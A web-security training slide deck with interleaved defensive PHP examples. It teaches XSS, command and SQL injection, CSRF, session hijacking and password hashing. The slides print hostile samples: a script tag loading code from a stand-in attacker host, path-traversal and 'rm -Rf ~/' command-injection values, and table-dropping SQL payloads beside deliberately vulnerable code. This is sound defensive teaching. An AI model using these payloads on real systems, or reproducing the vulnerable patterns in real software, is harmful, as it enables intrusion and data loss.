Web Security 101

Even the best software engineers can open themselves up to threats with lazy coding. These slides cover the basics of web security, the most common attacks, and simple measures you can employ in order to prevent them.

This presentation covers coding best practices and the following types of attacks:

• XSS - Cross-Site Scripting

• XSRF - Cross-Site Request Forgery

• Session Hijacking

• SQL Injection

Published in: Software

Web Security 101

  1. © 2015 Adobe Systems Incorporated. All Rights Reserved.
     Web Security 101
     Brent Shaffer | Matrix Architect
  2. Why are we talking about this?
     ▪ Your framework / programming language does not do everything for you
     ▪ Your website is vulnerable
       ▪ Security through obscurity is not sufficient
       ▪ Your friends may want to embarrass you
       ▪ "hacktivists" might make you look like a fool
       ▪ bots are always busy
     ▪ Many attacks are easy to prevent
     ▪ The first step is becoming aware of the types of attacks that exist
  3. Kinds of Attacks
     1 | Cross Site Scripting (XSS)
     2 | Code Injection
     3 | Cross Site Request Forgery (CSRF)
     4 | Session Hijacking
     5 | So many, many more...
  4. Rules of Thumb
     ▪ All Inputs are Evil!
     ▪ Do not trust your users
     ▪ Do not trust your users' cookies, parameters, or HTTP Headers
     ▪ "All servers are evil" is also a good assumption for end-users
     ▪ Whitelists are better than blacklists
     ▪ Never store passwords in plaintext
     ▪ Never store your passwords in source code
     ▪ Don't leak error messages
  5. Cross Site Scripting (XSS)
     ▪ The term XSS describes a specific kind of injection attack
     ▪ XSS injects JavaScript (or other scripts) that run on the victim's client (browser)
     ▪ This malicious code usually steals cookies of the person who views the infected web page.
     ▪ Exploits a user's trust of a site. Can be combined with phishing or CSRF to steal all kinds of things.
     ▪ Accounted for 84% of all website security vulnerabilities (Symantec, 2007)

       <script src="http://attacker-site.com/malicious-code.js"></script>
  6. Cross Site Scripting (XSS)
     ▪ Validate user input when storing
     ▪ Escape when using variables in output
       ▪ based on the content type it's being used in
       ▪ Escaping HTML for a variable in JavaScript will not save you
     ▪ Use Templating Languages
       ▪ HAML, Twig (PHP), Jinja (Python), Pebble (Java)
       ▪ If this isn't possible, use Output Escaping
     ▪ Use a Markup Language if you want user-input rich text
       ▪ markdown, textile, rst
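Slide 6's point that escaping must match the output context, shown as an added example (not code from the deck): one constructed user value placed in an HTML body, in a JavaScript string inside an event-handler attribute, and in a script block. The escaper names are assumptions; the PHP functions they wrap are standard.

```php
<?php
// Added example, not from the deck: the same user-controlled value in three
// output contexts. Only the escaper that matches the context is safe.

// Constructed input in the spirit of the deck's cookie-stealing payload.
$input = "');alert(document.cookie);//";

// HTML body / attribute context.
function escape_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript string context: a JSON literal with <, >, &, ' and " hex-escaped,
// so the result can neither close a <script> block nor an attribute quote.
function escape_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// 1. HTML context with the HTML escaper: correct.
echo '<p>Hello ' . escape_html($input) . "</p>\n";

// 2. JavaScript inside an onclick attribute with ONLY the HTML escaper: wrong.
//    The browser decodes &#039; back to ' while parsing the attribute, so the
//    JS engine receives  greet('');alert(document.cookie);//')  and runs it.
echo '<button onclick="greet(\'' . escape_html($input) . '\')">Hi</button>' . "\n";

// 3. Same attribute, JS escaper for the inner context first, then the HTML
//    escaper for the outer one: the JS engine sees a single string literal.
echo '<button onclick="greet(' . escape_html(escape_js($input)) . ')">Hi</button>' . "\n";

// 4. A <script> block is raw text to the HTML parser, so here the JS escaper
//    alone is right; JSON_HEX_TAG keeps "</script>" in the data from ending it.
echo '<script>var greeting = ' . escape_js($input) . ";</script>\n";
```

Case 2 is the slide's "HTML escaping will not save you": escape for the innermost context first, then for each context that wraps it.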
  7. Code Injection
     ▪ Comes in many forms
       ▪ Command-Line injection
       ▪ SQL-injection
       ▪ HTML
       ▪ JavaScript (XSS)
  8. Code Injection - Command-Line injection
     ▪ File paths based on user input is NOT OKAY

       $user_id = $_GET['user_id'];
       $file = "/some/path/config/$user_id.json";
       require $file;

     ▪ Attackers can access the filesystem using "upwards" paths

       ?user_id=../../../etc/passwd #
  9. Code Injection - Command-Line injection

       $user_id = $_GET['user_id'];
       $pic = "/some/path/pictures/$user_id.jpg";
       if (`ls $pic`) { ... }

     ▪ Avoid user input when executing on the command line
     ▪ Commands like exec, passthru, and system are often used to execute bash commands

       ?user_id=./ && rm -Rf ~/
  10. Code Injection - Command-Line injection

       $user_id = $_GET['user_id'];
       $file = "/some/path/config/$user_id.json";
       eval("file_get_contents('$file');");

     ▪ Avoid using dynamic code execution
     ▪ Commands like eval are used to dynamically evaluate PHP code

       ?user_id=foo');file_get_contents('etc/passwd
  11. Code Injection - Command-Line injection
     ▪ strip "upwards" paths
     ▪ ensure all files are relative to a safe "root"
     ▪ be very strict on validation
     ▪ output-escaping depending on the context
       ▪ escapeshellcmd for exec
       ▪ addslashes for eval
     ▪ use with extreme caution
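Slide 11's rules applied to the code on slides 8 and 9, as an added example that is not from the deck: a whitelist on the id, a canonical-path check against a fixed root, and a single quoted shell argument. The root directory and function names are assumptions, and escapeshellarg() is used for the argument where the slide names escapeshellcmd().

```php
<?php
// Added example, not from the deck: resolving a user-supplied id to a file
// under a fixed root as slide 11 prescribes (strict validation, no "upwards"
// paths, everything relative to a safe root). The root directory is assumed.

const CONFIG_ROOT = '/some/path/config';   // path from the slide, assumed to exist

// Returns the canonical path of the user's config file, or null when rejected.
function config_path_for(string $user_id): ?string {
    // Whitelist, not blacklist: only the characters an id may contain.
    // "../", "/", NUL bytes and shell metacharacters all fail this check.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $user_id)) {
        return null;
    }
    $candidate = CONFIG_ROOT . '/' . $user_id . '.json';

    // Belt and braces: canonicalise (resolving symlinks too) and confirm the
    // result is still inside the root. realpath() is false for a missing file.
    $real = realpath($candidate);
    $root = realpath(CONFIG_ROOT);
    if ($real === false || $root === false || strpos($real, $root . '/') !== 0) {
        return null;
    }
    return $real;
}

// When a shell command must take user data (slide 9's `ls $pic`): validate
// first, then hand it over as ONE quoted argument via escapeshellarg(), so the
// shell never interprets "&&" or ";" from the value as operators.
function picture_listing(string $user_id): ?string {
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $user_id)) {
        return null;
    }
    $pic = '/some/path/pictures/' . $user_id . '.jpg';
    return shell_exec('ls -l ' . escapeshellarg($pic) . ' 2>/dev/null');
}

// Constructed inputs: the payloads from slides 8 and 9 plus a normal id, which
// resolves only if /some/path/config/alice.json actually exists.
foreach (['../../../etc/passwd', './ && rm -Rf ~/', 'alice'] as $id) {
    $path = config_path_for($id);
    printf("%-22s => %s\n", $id, $path === null ? 'rejected' : $path);
}
```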
  12. Code Injection - SQL injection
     [comic, © xkcd.com]
  13. Code Injection - SQL injection
     ▪ Similar to code injection, but happens when user input is used as part of a SQL query

       $search = $_GET['search'];
       $sql = "SELECT * FROM students WHERE name = '$search'";

     ▪ Can be used to delete, corrupt, or steal data.

       ?search=';DROP ALL TABLES
       ?search=';UPDATE students SET name=jerkface
       ?search=foo' OR public=0
  14. Code Injection - SQL injection
     ▪ SANITIZE YOUR INPUTS
     ▪ use "bound variables"

       $search = $_GET['search'];
       $sql = "SELECT * FROM students WHERE name = ?";
       $statement = $pdo->prepare($sql);
       $statement->execute([$search]);

     ▪ Use ORMs / Database Abstraction Layers when possible
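Slides 13 and 14 side by side, as an added example that is not from the deck: the interpolated query and the bound-parameter query run against an in-memory SQLite table so the difference is visible. It assumes the pdo_sqlite extension; the table rows and the function names are constructed.

```php
<?php
// Added example, not from the deck: slide 13's query run against an in-memory
// SQLite database, once with string interpolation and once with a bound
// parameter. Assumes the pdo_sqlite extension; the rows are constructed.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE students (name TEXT, public INTEGER)');
$pdo->exec("INSERT INTO students VALUES ('alice', 1), ('bob', 0), ('carol', 0)");

// Vulnerable: the user's text becomes part of the SQL statement itself.
function find_interpolated(PDO $pdo, string $search): array {
    $sql = "SELECT name FROM students WHERE name = '$search'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed: the statement text is constant and the value travels separately as
// a bound parameter, so quotes and keywords inside it are only ever data.
function find_bound(PDO $pdo, string $search): array {
    $stmt = $pdo->prepare('SELECT name FROM students WHERE name = ?');
    $stmt->execute([$search]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Slide 13's "foo' OR public=0" payload with a trailing SQL comment ("--")
// appended so the leftover closing quote is ignored and the query parses.
$payload = "foo' OR public=0 --";

// Interpolated: the WHERE clause becomes   name = 'foo' OR public=0 --'
// and every non-public student comes back.
echo "interpolated: ", implode(', ', find_interpolated($pdo, $payload)), "\n";

// Bound: the database looks for a student literally named "foo' OR public=0 --".
echo "bound:        ", implode(', ', find_bound($pdo, $payload)), "\n";

// A legitimate search goes through the bound version unchanged.
echo "bound alice:  ", implode(', ', find_bound($pdo, 'alice')), "\n";
```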
  15. Cross-Site Request Forgery (CSRF)
     ▪ Exploits the browsers running on the client
     ▪ Exploits a site's trust in its users
     ▪ Victim is logged into Vulnerable Website
     ▪ Attacker has Victim make a request to Vulnerable Website without them knowing
       ▪ Victim submits a form on Fake Website, but it actually posts to Vulnerable Website
       ▪ Victim clicks a link it believes is for Fake Website, but it actually goes to Vulnerable Website
     ▪ An action is executed on behalf of Victim that they did not intend

       https://facebook.com/authorize?client_id=HackerGuy&authorized=true

     ▪ The Infamous "Samy Worm"
  16. Cross-Site Request Forgery (CSRF)
     ▪ Validate the Referer
       ▪ The HTTP Referer header (spelt that way in the standard) says which URL initiated the request
       ▪ You can use this to block any referer that isn't you
       ▪ Only works if a whitelist can be constructed for where the requests will come from
     ▪ Use a CSRF-Token
       ▪ This is a token generated for each request based on the client's session ID
       ▪ Each form submits this back to the website
       ▪ Very difficult for an attacker to spoof

       <input type="hidden" name="csrf" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt">
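The CSRF token from slide 16, covering the attack described on slide 15, as an added example that is not from the deck: a token derived from the session ID with a server-side secret, rendered as the hidden field the slide shows, and checked on submission. The secret, the session ID and the function names are constructed placeholders.

```php
<?php
// Added example, not from the deck: a CSRF token derived from the session id
// with a server-side secret (slide 16: "based on the client's session ID"),
// emitted as a hidden field and verified on POST. Values below are constructed.

const CSRF_SECRET = 'REPLACE-WITH-A-LONG-RANDOM-SECRET-FROM-CONFIG';   // placeholder

// Token bound to this session: a page on another origin cannot compute it
// without the secret and cannot read it out of our forms.
function csrf_token(string $session_id): string {
    return hash_hmac('sha256', $session_id, CSRF_SECRET);
}

// The hidden input every state-changing form carries.
function csrf_hidden_input(string $session_id): string {
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars(csrf_token($session_id), ENT_QUOTES, 'UTF-8') . '">';
}

// Reject a missing token, and compare in constant time so the response time
// does not leak how many leading bytes of a guess were right.
function csrf_validate(string $session_id, ?string $submitted): bool {
    if ($submitted === null) {
        return false;
    }
    return hash_equals(csrf_token($session_id), $submitted);
}

// In a real request you would use session_id() after session_start() and
// $_POST['csrf'] ?? null; a constructed session id stands in here.
$session_id = 'constructed-session-id-1234';
echo csrf_hidden_input($session_id), "\n";

$genuine = csrf_token($session_id);                 // what our own form submits
$guess   = 'KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt';       // the slide's sample value, standing in for a forged one
foreach (['genuine' => $genuine, 'forged' => $guess, 'missing' => null] as $label => $token) {
    printf("%-8s => %s\n", $label, csrf_validate($session_id, $token) ? 'accepted' : 'rejected');
}
```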
  17. Session Hijacking
     ▪ Similar to CSRF
     ▪ The attacker obtains the victim's cookie, and is then able to perform actions on their behalf
     ▪ Typically done for websites not secured with SSL/HTTPS
     ▪ Open networks and insecure networks (WEP) commonly found in public areas make it possible to view other traffic on the same router
     ▪ Plugins make this incredibly easy
       ▪ FireSheep / Cookie Cadger / DroidSheep
     ▪ Sniffing is easy with tools like Wireshark
  18. Session Hijacking
     ▪ Use SSL/HTTPS you dummy!
     ▪ It is not enough to only secure the page the user logs into
     ▪ Don't allow HTTP on any site with user logins
     ▪ As the end user, usually whining and complaining can go a long way
       ▪ A few months after FireSheep, Facebook and Twitter implemented HTTPS throughout the site
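What slide 18's "don't allow HTTP on any site with user logins" looks like at the top of a PHP front controller, as an added example that is not from the deck: redirect plain HTTP away, send HSTS, and mark the session cookie so it is never transmitted in the clear. The host name, the HSTS lifetime and the proxy header handling are assumptions; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example, not from the deck: enforcing HTTPS for the whole site and
// keeping the session cookie off plain HTTP. Runs before session_start();
// APP_HOST and the HSTS lifetime are assumptions. Requires PHP 7.3+.

const APP_HOST = 'example.com';   // canonical host, never taken from the request

// True when this request arrived over TLS, directly or through a reverse
// proxy that sets X-Forwarded-Proto (trust that header only from your proxy).
function request_is_https(): bool {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    }
    return strtolower($_SERVER['HTTP_X_FORWARDED_PROTO'] ?? '') === 'https';
}

// 1. Never serve the app over plain HTTP: if the session cookie crosses the
//    wire unencrypted even once, a sniffer on the same network has it.
if (!request_is_https()) {
    header('Location: https://' . APP_HOST . ($_SERVER['REQUEST_URI'] ?? '/'), true, 301);
    exit;
}

// 2. HSTS: a browser that has seen this refuses plain HTTP to us for a year,
//    so even a typed "http://" link is upgraded before the first request.
header('Strict-Transport-Security: max-age=31536000; includeSubDomains');

// 3. Flags on the session id cookie: Secure keeps it off HTTP connections,
//    HttpOnly hides it from injected scripts (the XSS slides), and
//    SameSite=Lax stops most cross-site POSTs from carrying it (the CSRF slides).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();
```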
  19. Proper Password Management
     ▪ NEVER STORE PASSWORDS IN PLAINTEXT
     ▪ always use a hash (one-way)
     ▪ just hashing is not enough
       ▪ Lookup Tables / Rainbow Tables
       ▪ all passwords < 7 characters require 64GB space to crack
     ▪ always use a salt
       ▪ a random unique string for each password
  20. Proper Password Management
     ▪ Brute Forcing
       ▪ a lot faster than you think
       ▪ 2012 MacBook Pro for salted MD5s:
         ▪ 6 char passwords: 5 hours
         ▪ 7 char passwords: 22 days
         ▪ entire English language: 1.8 seconds
     ▪ How to combat
       ▪ Use slow algorithms
       ▪ Iterate over hashing functions a lot of times
       ▪ require 8-character passwords, numbers/symbols, etc.
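Slides 19 and 20 in code, as an added example that is not from the deck: PHP's built-in password_hash() gives a random per-password salt and a deliberately slow, iterated algorithm (bcrypt) in one call, and password_needs_rehash() lets you raise the work factor later. The cost value, the function names and the sample passwords are constructed.

```php
<?php
// Added example, not from the deck: slides 19-20 applied with password_hash(),
// which uses bcrypt: a slow algorithm, iterated 2^cost times, with a random
// salt generated for every call and stored inside the hash string itself.

const BCRYPT_COST = 12;   // assumption; each +1 doubles the time, tune to ~250 ms on your hardware

function store_password(string $password): string {
    // Result looks like "$2y$12$<22-char salt><31-char hash>": algorithm, cost
    // and salt are all recorded, so no separate salt column is needed.
    // (bcrypt only looks at the first 72 bytes of the password.)
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
}

function check_password(string $password, string $stored_hash): bool {
    // Reads the salt and cost out of the stored hash, recomputes, and compares
    // in constant time; false for a wrong password or a foreign hash format.
    return password_verify($password, $stored_hash);
}

// Hashes made with an older, cheaper cost get upgraded at the next successful
// login, when the plaintext is briefly available.
function upgrade_if_needed(string $password, string $stored_hash): string {
    if (password_needs_rehash($stored_hash, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST])) {
        return store_password($password);
    }
    return $stored_hash;
}

$h1 = store_password('correct horse battery staple');
$h2 = store_password('correct horse battery staple');
echo $h1, "\n", $h2, "\n";   // same password, two hashes: the salt differs every time

foreach (['correct horse battery staple', 'Tr0ub4dor&3'] as $attempt) {
    printf("%-30s => %s\n", $attempt, check_password($attempt, $h1) ? 'accepted' : 'rejected');
}

// Slide 20's "use slow algorithms", measured: one hash at the configured cost.
$t = microtime(true);
store_password('timing sample');
printf("one bcrypt hash at cost %d took %.0f ms\n", BCRYPT_COST, (microtime(true) - $t) * 1000);
```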
  21. Resources
     ▪ Top 10 Common Attacks: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
     ▪ Automatic SQL Injection & Database Takeover Tool: http://sqlmap.org
     ▪ Amazon Mistake: http://www.devfactor.net/2014/12/30/2375-amazon-mistake/
     ▪ Burger King Hack: http://mashable.com/2013/02/18/burger-king-twitter-account-hacked/
     ▪ Twitter Hack: http://countermeasures.trendmicro.eu/twitter-not-hacked-by-iranian-cyber-army/
     ▪ Samy's Confession: http://namb.la/popular/tech.html
     ▪ Bobby Tables: http://bobby-tables.com
     ▪ Notorious Hacks: http://www.arnnet.com.au/slideshow/341113/top-10-most-notorious-cyber-attacks-history
     ▪ Passwords: http://www.slideshare.net/ircmaxell/password-storage-and-attacking-in-php-php-argentina
     ▪ More Good Slides: http://www.slideshare.net/mpeters/web-security-101
  22. Questions?
     Brent Shaffer
     bshafs@gmail.com
     Twitter: @bshaffer
     Github: @bshaffer